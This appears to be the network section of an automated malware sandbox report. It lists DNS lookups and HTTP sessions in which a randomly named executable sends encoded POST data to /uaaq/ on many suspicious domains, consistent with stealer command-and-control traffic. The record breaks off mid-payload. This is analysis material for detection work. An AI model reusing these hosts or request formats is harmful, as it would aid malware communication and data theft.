                                                                                    Dec 4, 2023 12:10:45.881274939 CET53505311.1.1.1192.168.11.30

                                                                                    DNS Queries

                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                    Dec 4, 2023 12:03:14.253987074 CET192.168.11.301.1.1.10x3e0eStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                    Dec 4, 2023 12:03:15.773514986 CET192.168.11.301.1.1.10x22Standard query (0)doc-0g-ag-docs.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                    Dec 4, 2023 12:03:36.738187075 CET192.168.11.301.1.1.10xb0afStandard query (0)www.90dayleaderlab.comA (IP address)IN (0x0001)false
                                                                                    Dec 4, 2023 12:03:52.254925966 CET192.168.11.301.1.1.10xac98Standard query (0)www.foodpackaging-jobs07.xyzA (IP address)IN (0x0001)false
                                                                                    Dec 4, 2023 12:04:06.017551899 CET192.168.11.301.1.1.10x40cbStandard query (0)www.rocsys.netA (IP address)IN (0x0001)false
                                                                                    Dec 4, 2023 12:04:20.217272043 CET192.168.11.301.1.1.10xc0c4Standard query (0)www.tubidy.techA (IP address)IN (0x0001)false
                                                                                    Dec 4, 2023 12:04:33.526885986 CET192.168.11.301.1.1.10xd240Standard query (0)www.infinite-7.comA (IP address)IN (0x0001)false
                                                                                    Dec 4, 2023 12:04:47.227565050 CET192.168.11.301.1.1.10x2935Standard query (0)www.resolution-pj.comA (IP address)IN (0x0001)false
                                                                                    Dec 4, 2023 12:05:01.724347115 CET192.168.11.301.1.1.10x5006Standard query (0)www.atlasmisc.orgA (IP address)IN (0x0001)false
                                                                                    Dec 4, 2023 12:05:15.345552921 CET192.168.11.301.1.1.10xe05eStandard query (0)www.mariannaserocka.comA (IP address)IN (0x0001)false
                                                                                    Dec 4, 2023 12:05:29.826725006 CET192.168.11.301.1.1.10x4b41Standard query (0)www.spark-tech-global.xyzA (IP address)IN (0x0001)false
                                                                                    Dec 4, 2023 12:05:43.683109999 CET192.168.11.301.1.1.10x63b6Standard query (0)www.ayotundewrites.comA (IP address)IN (0x0001)false
                                                                                    Dec 4, 2023 12:05:57.601852894 CET192.168.11.301.1.1.10x8a84Standard query (0)www.viough.comA (IP address)IN (0x0001)false
                                                                                    Dec 4, 2023 12:07:28.566004992 CET192.168.11.301.1.1.10xadeeStandard query (0)www.luciengeorge.comA (IP address)IN (0x0001)false
                                                                                    Dec 4, 2023 12:07:42.265824080 CET192.168.11.301.1.1.10xf7f6Standard query (0)www.realadvertisements.comA (IP address)IN (0x0001)false
                                                                                    Dec 4, 2023 12:07:50.545291901 CET192.168.11.301.1.1.10x312bStandard query (0)www.tunug.xyzA (IP address)IN (0x0001)false
                                                                                    Dec 4, 2023 12:08:04.886055946 CET192.168.11.301.1.1.10x2e96Standard query (0)www.dabblefurnishings.spaceA (IP address)IN (0x0001)false
                                                                                    Dec 4, 2023 12:08:18.148485899 CET192.168.11.301.1.1.10x2fdStandard query (0)www.projectmerdeka.comA (IP address)IN (0x0001)false
                                                                                    Dec 4, 2023 12:10:45.646964073 CET192.168.11.301.1.1.10xcc52Standard query (0)www.popup-shops.usA (IP address)IN (0x0001)false

                                                                                    DNS Answers

                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                    Dec 4, 2023 12:03:14.349222898 CET1.1.1.1192.168.11.300x3e0eNo error (0)drive.google.com142.250.65.174A (IP address)IN (0x0001)false
                                                                                    Dec 4, 2023 12:03:15.886312962 CET1.1.1.1192.168.11.300x22No error (0)doc-0g-ag-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                    Dec 4, 2023 12:03:15.886312962 CET1.1.1.1192.168.11.300x22No error (0)googlehosted.l.googleusercontent.com142.251.40.129A (IP address)IN (0x0001)false
                                                                                    Dec 4, 2023 12:03:36.987206936 CET1.1.1.1192.168.11.300xb0afNo error (0)www.90dayleaderlab.com66.96.162.142A (IP address)IN (0x0001)false
                                                                                    Dec 4, 2023 12:03:52.536854029 CET1.1.1.1192.168.11.300xac98No error (0)www.foodpackaging-jobs07.xyz64.190.62.22A (IP address)IN (0x0001)false
                                                                                    Dec 4, 2023 12:04:06.401607037 CET1.1.1.1192.168.11.300x40cbNo error (0)www.rocsys.netrocsys.netCNAME (Canonical name)IN (0x0001)false
                                                                                    Dec 4, 2023 12:04:06.401607037 CET1.1.1.1192.168.11.300x40cbNo error (0)rocsys.net37.97.254.27A (IP address)IN (0x0001)false
                                                                                    Dec 4, 2023 12:04:20.331108093 CET1.1.1.1192.168.11.300xc0c4No error (0)www.tubidy.tech146.148.34.125A (IP address)IN (0x0001)false
                                                                                    Dec 4, 2023 12:04:33.736932039 CET1.1.1.1192.168.11.300xd240No error (0)www.infinite-7.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                                                                                    Dec 4, 2023 12:04:33.736932039 CET1.1.1.1192.168.11.300xd240No error (0)parkingpage.namecheap.com91.195.240.19A (IP address)IN (0x0001)false
                                                                                    Dec 4, 2023 12:04:47.719650984 CET1.1.1.1192.168.11.300x2935No error (0)www.resolution-pj.com133.130.64.24A (IP address)IN (0x0001)false
                                                                                    Dec 4, 2023 12:05:01.862508059 CET1.1.1.1192.168.11.300x5006No error (0)www.atlasmisc.org91.195.240.117A (IP address)IN (0x0001)false
                                                                                    Dec 4, 2023 12:05:15.783526897 CET1.1.1.1192.168.11.300xe05eNo error (0)www.mariannaserocka.com65.108.122.245A (IP address)IN (0x0001)false
                                                                                    Dec 4, 2023 12:05:30.072875977 CET1.1.1.1192.168.11.300x4b41No error (0)www.spark-tech-global.xyz162.0.222.119A (IP address)IN (0x0001)false
                                                                                    Dec 4, 2023 12:05:44.114969969 CET1.1.1.1192.168.11.300x63b6No error (0)www.ayotundewrites.comayotundewrites.comCNAME (Canonical name)IN (0x0001)false
                                                                                    Dec 4, 2023 12:05:44.114969969 CET1.1.1.1192.168.11.300x63b6No error (0)ayotundewrites.com83.229.19.76A (IP address)IN (0x0001)false
                                                                                    Dec 4, 2023 12:05:57.730386972 CET1.1.1.1192.168.11.300x8a84No error (0)www.viough.com163.197.216.134A (IP address)IN (0x0001)false
                                                                                    Dec 4, 2023 12:07:28.770759106 CET1.1.1.1192.168.11.300xadeeNo error (0)www.luciengeorge.comskeletal-caterpillar-5caa8z0zckv31hwhum7ccarw.herokudns.comCNAME (Canonical name)IN (0x0001)false
                                                                                    Dec 4, 2023 12:07:28.770759106 CET1.1.1.1192.168.11.300xadeeNo error (0)skeletal-caterpillar-5caa8z0zckv31hwhum7ccarw.herokudns.com54.73.26.109A (IP address)IN (0x0001)false
                                                                                    Dec 4, 2023 12:07:28.770759106 CET1.1.1.1192.168.11.300xadeeNo error (0)skeletal-caterpillar-5caa8z0zckv31hwhum7ccarw.herokudns.com54.216.252.255A (IP address)IN (0x0001)false
                                                                                    Dec 4, 2023 12:07:28.770759106 CET1.1.1.1192.168.11.300xadeeNo error (0)skeletal-caterpillar-5caa8z0zckv31hwhum7ccarw.herokudns.com108.128.72.146A (IP address)IN (0x0001)false
                                                                                    Dec 4, 2023 12:07:42.492959023 CET1.1.1.1192.168.11.300xf7f6Name error (3)www.realadvertisements.comnonenoneA (IP address)IN (0x0001)false
                                                                                    Dec 4, 2023 12:07:51.204457045 CET1.1.1.1192.168.11.300x312bNo error (0)www.tunug.xyztunug.xyzCNAME (Canonical name)IN (0x0001)false
                                                                                    Dec 4, 2023 12:07:51.204457045 CET1.1.1.1192.168.11.300x312bNo error (0)tunug.xyz31.186.11.254A (IP address)IN (0x0001)false
                                                                                    Dec 4, 2023 12:08:05.044981003 CET1.1.1.1192.168.11.300x2e96No error (0)www.dabblefurnishings.space66.96.162.139A (IP address)IN (0x0001)false
                                                                                    Dec 4, 2023 12:08:18.986912012 CET1.1.1.1192.168.11.300x2fdNo error (0)www.projectmerdeka.comprojectmerdeka.comCNAME (Canonical name)IN (0x0001)false
                                                                                    Dec 4, 2023 12:08:18.986912012 CET1.1.1.1192.168.11.300x2fdNo error (0)projectmerdeka.com203.175.9.19A (IP address)IN (0x0001)false
                                                                                    Dec 4, 2023 12:10:45.881274939 CET1.1.1.1192.168.11.300xcc52No error (0)www.popup-shops.usparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                                                                                    Dec 4, 2023 12:10:45.881274939 CET1.1.1.1192.168.11.300xcc52No error (0)parkingpage.namecheap.com91.195.240.19A (IP address)IN (0x0001)false

                                                                                    HTTP Request Dependency Graph

                                                                                    • drive.google.com
                                                                                    • doc-0g-ag-docs.googleusercontent.com
                                                                                    • www.90dayleaderlab.com
                                                                                    • www.foodpackaging-jobs07.xyz
                                                                                    • www.rocsys.net
                                                                                    • www.tubidy.tech
                                                                                    • www.infinite-7.com
                                                                                    • www.resolution-pj.com
                                                                                    • www.atlasmisc.org
                                                                                    • www.mariannaserocka.com
                                                                                    • www.spark-tech-global.xyz
                                                                                    • www.ayotundewrites.com
                                                                                    • www.viough.com
                                                                                    • www.luciengeorge.com
                                                                                    • www.tunug.xyz
                                                                                    • www.dabblefurnishings.space
                                                                                    • www.projectmerdeka.com
                                                                                    • www.popup-shops.us

                                                                                    HTTP Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.11.304975266.96.162.142803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:03:37.095758915 CET430OUTGET /uaaq/?XFs82=6R5Xx6907&9pG0L=+hwd8iQl6WZFyEABA14fCozFKvDxgRtGAMGA5XpujhmfuyD+xbLuSxr/3p1qd9/7OnNOS7bQf7l0CX87MYfqK2olkbn4aBNvHA== HTTP/1.1
                                                                                    Host: www.90dayleaderlab.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:03:37.208832979 CET811INHTTP/1.1 302 Found
                                                                                    Date: Mon, 04 Dec 2023 11:03:37 GMT
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Content-Length: 347
                                                                                    Connection: close
                                                                                    Server: Apache/2
                                                                                    Location: https://www.90dayleaderlab.com/uaaq/?XFs82=6R5Xx6907&9pG0L=+hwd8iQl6WZFyEABA14fCozFKvDxgRtGAMGA5XpujhmfuyD+xbLuSxr/3p1qd9/7OnNOS7bQf7l0CX87MYfqK2olkbn4aBNvHA==
                                                                                    Cache-Control: max-age=3600
                                                                                    Expires: Mon, 04 Dec 2023 12:03:37 GMT
                                                                                    Age: 0
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 39 30 64 61 79 6c 65 61 64 65 72 6c 61 62 2e 63 6f 6d 2f 75 61 61 71 2f 3f 58 46 73 38 32 3d 36 52 35 58 78 36 39 30 37 26 61 6d 70 3b 39 70 47 30 4c 3d 2b 68 77 64 38 69 51 6c 36 57 5a 46 79 45 41 42 41 31 34 66 43 6f 7a 46 4b 76 44 78 67 52 74 47 41 4d 47 41 35 58 70 75 6a 68 6d 66 75 79 44 2b 78 62 4c 75 53 78 72 2f 33 70 31 71 64 39 2f 37 4f 6e 4e 4f 53 37 62 51 66 37 6c 30 43 58 38 37 4d 59 66 71 4b 32 6f 6c 6b 62 6e 34 61 42 4e 76 48 41 3d 3d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://www.90dayleaderlab.com/uaaq/?XFs82=6R5Xx6907&amp;9pG0L=+hwd8iQl6WZFyEABA14fCozFKvDxgRtGAMGA5XpujhmfuyD+xbLuSxr/3p1qd9/7OnNOS7bQf7l0CX87MYfqK2olkbn4aBNvHA==">here</a>.</p></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1192.168.11.304975464.190.62.22803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:03:52.720055103 CET728OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.foodpackaging-jobs07.xyz
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.foodpackaging-jobs07.xyz
                                                                                    Referer: http://www.foodpackaging-jobs07.xyz/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 186
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 54 66 66 36 38 6c 76 51 62 68 39 2f 70 6e 4d 43 5a 73 37 2f 71 59 39 72 63 61 63 59 56 36 75 39 77 65 6b 7a 35 5a 6f 6b 6e 6c 6c 51 77 34 6f 58 4a 37 66 37 76 50 59 49 2f 72 55 74 37 66 51 33 59 6c 44 44 4e 6a 46 54 73 6a 64 75 7a 52 38 37 51 63 72 6c 30 4e 67 49 35 6f 77 41 4c 5a 70 47 6d 37 77 4c 56 64 43 66 37 41 69 30 53 61 35 63 67 42 58 53 51 47 30 52 57 34 32 4f 51 48 73 70 35 67 55 63 31 58 43 44 63 72 37 48 39 42 42 49 36 43 37 61 6a 35 39 6c 4d 58 46 46 34 43 4c 34 4b 68 47 63 4a 30 39 48 58 4d 77 5a 45 45 36 37 32 51 3d 3d
                                                                                    Data Ascii: 9pG0L=Tff68lvQbh9/pnMCZs7/qY9rcacYV6u9wekz5ZoknllQw4oXJ7f7vPYI/rUt7fQ3YlDDNjFTsjduzR87Qcrl0NgI5owALZpGm7wLVdCf7Ai0Sa5cgBXSQG0RW42OQHsp5gUc1XCDcr7H9BBI6C7aj59lMXFF4CL4KhGcJ09HXMwZEE672Q==
                                                                                    Dec 4, 2023 12:03:52.902612925 CET755INHTTP/1.1 405 Not Allowed
                                                                                    date: Mon, 04 Dec 2023 11:03:52 GMT
                                                                                    content-type: text/html
                                                                                    content-length: 556
                                                                                    server: NginX
                                                                                    connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2192.168.11.304975564.190.62.22803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:03:55.421380043 CET748OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.foodpackaging-jobs07.xyz
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.foodpackaging-jobs07.xyz
                                                                                    Referer: http://www.foodpackaging-jobs07.xyz/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 206
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 54 66 66 36 38 6c 76 51 62 68 39 2f 37 58 38 43 61 4c 6e 2f 37 6f 39 71 5a 61 63 59 62 71 75 35 77 66 59 7a 35 62 45 4b 6e 32 42 51 77 61 41 58 62 4b 66 37 73 50 59 49 30 4c 56 6e 31 2f 52 37 59 6c 47 30 4e 69 35 54 73 6a 4a 75 7a 51 4d 37 52 74 72 6d 31 64 67 57 79 49 77 47 46 35 70 47 6d 37 77 4c 56 64 2f 34 37 42 47 30 54 72 4a 63 69 6c 4c 52 59 6d 30 53 56 34 32 4f 43 33 73 74 35 67 55 36 31 53 69 35 63 74 2f 48 39 41 52 49 36 7a 37 56 71 35 39 6e 43 33 45 51 78 68 79 52 50 51 36 63 4f 6c 70 6c 4a 70 4a 79 42 52 57 6f 78 6f 33 62 63 37 74 51 55 52 65 31 34 2f 30 48 6d 52 70 59 66 69 67 3d
                                                                                    Data Ascii: 9pG0L=Tff68lvQbh9/7X8CaLn/7o9qZacYbqu5wfYz5bEKn2BQwaAXbKf7sPYI0LVn1/R7YlG0Ni5TsjJuzQM7Rtrm1dgWyIwGF5pGm7wLVd/47BG0TrJcilLRYm0SV42OC3st5gU61Si5ct/H9ARI6z7Vq59nC3EQxhyRPQ6cOlplJpJyBRWoxo3bc7tQURe14/0HmRpYfig=
                                                                                    Dec 4, 2023 12:03:55.604231119 CET755INHTTP/1.1 405 Not Allowed
                                                                                    date: Mon, 04 Dec 2023 11:03:55 GMT
                                                                                    content-type: text/html
                                                                                    content-length: 556
                                                                                    server: NginX
                                                                                    connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3192.168.11.304975664.190.62.22803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:03:58.123720884 CET1665OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.foodpackaging-jobs07.xyz
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.foodpackaging-jobs07.xyz
                                                                                    Referer: http://www.foodpackaging-jobs07.xyz/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 1122
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 54 66 66 36 38 6c 76 51 62 68 39 2f 37 58 38 43 61 4c 6e 2f 37 6f 39 71 5a 61 63 59 62 71 75 35 77 66 59 7a 35 62 45 4b 6e 32 4a 51 77 72 67 58 4b 64 6a 37 74 50 59 49 35 72 56 6d 31 2f 52 32 59 6c 2b 34 4e 69 30 78 73 6e 35 75 70 79 45 37 41 70 48 6d 38 64 67 57 39 6f 77 44 4c 5a 70 58 6d 37 67 50 56 64 50 34 37 42 47 30 54 6f 52 63 6c 78 58 52 65 6d 30 52 57 34 32 4b 51 48 73 4a 35 68 38 45 31 53 76 62 63 39 66 48 38 68 68 49 34 68 54 56 6f 5a 39 66 42 33 46 54 78 67 4f 4b 50 51 32 71 4f 6c 4e 66 4a 75 6c 79 43 77 33 7a 69 4d 69 4d 4a 64 35 4c 53 31 61 49 37 61 6b 2f 79 52 5a 64 41 43 61 30 47 31 31 46 49 51 48 49 6a 31 42 76 79 36 44 43 42 32 6b 4b 6f 63 69 6b 4a 66 71 36 53 35 73 5a 6e 66 64 61 6e 6c 50 67 47 52 4e 54 34 7a 45 46 50 57 56 67 54 52 6d 37 75 2f 54 4c 50 4c 79 35 46 4a 70 39 53 66 72 64 54 51 66 4e 65 4b 31 4d 6a 6c 61 59 4e 76 44 74 64 34 41 57 73 65 51 6e 67 58 62 54 6d 6c 33 58 4f 4f 63 71 43 76 62 50 31 53 62 51 62 6b 72 77 72 70 56 31 74 65 43 65 6e 33 36 5a 65 6b 4e 56 7a 74 5a 79 50 4d 32 6c 39 7a 7a 42 41 53 69 58 4f 41 61 57 42 6e 4a 37 41 78 5a 57 51 57 34 4d 30 72 71 49 42 56 34 58 33 44 53 7a 6d 4c 39 63 6f 74 52 41 55 44 68 76 36 7a 57 72 33 45 36 43 56 54 59 4a 4b 76 64 78 55 4d 54 6f 51 34 50 51 39 52 6d 68 75 59 45 7a 6d 51 30 63 67 6b 46 33 2b 64 7a 63 64 47 5a 67 6c 49 69 32 30 77 45 41 44 6a 73 51 64 4a 2b 4e 59 75 47 4d 72 32 32 73 49 36 69 50 47 41 6d 68 69 78 42 65 6a 77 41 49 47 31 4d 6e 33 43 75 6b 74 42 41 39 64 5a 4a 46 66 44 32 38 6c 38 34 2b 74 55 57 75 72 35 35 78 35 49 64 6a 71 77 4e 7a 42 4e 77 37 6a 38 53 65 75 6d 77 52 56 4c 68 73 76 57 32 2f 77 47 33 4c 51 64 59 55 49 37 72 66 72 55 6a 75 65 43 76 6d 4a 6e 56 79 38 33 57 54 69 73 72 43 4d 50 6c 59 6d 31 62 44 44 4c 77 2f 2b 55 6d 52 7a 63 4f 44 64 4e 58 6a 62 72 30 5a 54 42 75 31 51 2f 47 4a 74 6d 35 45 4d 37 34 6c 56 52 5a 57 56 31 59 4d 63 71 61 68 32 48 33 48 37 30 44 56 42 43 52 34 35 6b 61 5a 6b 53 6b 6f 68 47 6a 74 6c 39 48 6a 4d 79 41 36 44 63 55 4a 52 75 72 79 79 6a 78 54 55 53 61 31 73 47 44 57 45 5a 42 65 41 4a 55 54 55 31 52 4a 42 36 68 2b 59 74 34 4d 45 4c 42 54 6c 53 4e 66 31 62 53 68 6e 37 58 74 52 30 52 47 71 38 6a 66 4e 76 76 52 63 52 47 4d 61 6e 35 48 70 4a 70 6a 50 4f 76 65 42 56 57 64 59 4a 61 67 30 59 41 70 46 41 55 2b 66 63 31 47 55 56 4c 4a 7a 41 4d 4a 52 2f 72 74 64 72 48 58 67 53 49 6b 64 68 79 38 6c 2f 4c 6f 64 64 6f 71 54 57 30 71 46 58 66 32 33 38 4b 70 49 74 4e 39 54 39 72 7a 48 51 4d 66 56 35 42 33 61 76 79 49 38 42 49 39 64 77 6e 48 59 37 51 4f 79 56 2b 6e 42 4f 57 41 53 67 42 76 43 75 6c 6e 7a 42 64 4c 73 34 43 50 39 4b 4b 74 49 4b 6f 30 74 30 2f 73 4b 47 70 2f 58 69 64 53 49 65 52 4d 46 45 4f 44 69 39 57 72 7a 46 43 63 4e 73 51 6f 6c 61 73 56 35 4e 39 49 6c 6f 34 39 52 66 4c 65 30 2b 57 4c 36 79 6c 68 37 46 77 65 51 35 45 65 46 44 56 2f 36 54 55 79 46 31 76 49 54 67 4b 50 68 4a 63 37 6b 32 33 32 2b 5a 6d 31 42 34 41 2f 38 51 2b 30 73 2b 41 